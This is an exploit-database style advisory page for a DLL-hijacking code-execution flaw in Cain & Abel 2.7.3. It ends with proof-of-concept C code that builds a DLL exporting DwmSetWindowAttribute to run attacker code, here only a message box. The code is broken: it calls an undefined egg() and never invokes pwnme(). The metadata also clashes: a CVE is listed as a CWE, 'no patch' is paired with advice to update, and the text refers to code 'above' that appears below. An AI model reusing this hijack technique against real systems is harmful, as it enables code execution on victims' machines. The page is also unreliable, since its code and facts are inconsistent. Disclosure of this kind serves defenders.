header-logo
Suggest Exploit
vendor:
Cain & Abel
by:
Unknown
7.5
CVSS
HIGH
Arbitrary Code Execution
94
CWE
Product Name: Cain & Abel
Affected Version From: 2.7.2003
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2011-3010
CPE: a:cain_&_abel_project:cain_&_abel:2.7.3
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

Arbitrary Code Execution in Cain & Abel

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. The exploit code given above demonstrates a possible way to exploit this vulnerability by hijacking the DwmSetWindowAttribute function and executing malicious code.

Mitigation:

To mitigate this vulnerability, users are advised to update to the latest version of Cain & Abel and avoid opening files from untrusted network share locations.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/46239/info

Cain & Abel is prone to an arbitrary-code-execution vulnerability.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Cain & Abel 2.7.3 is vulnerable; other versions may also be affected. 

#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }

int pwnme()
{
  MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
  exit(0);
  return 0;
}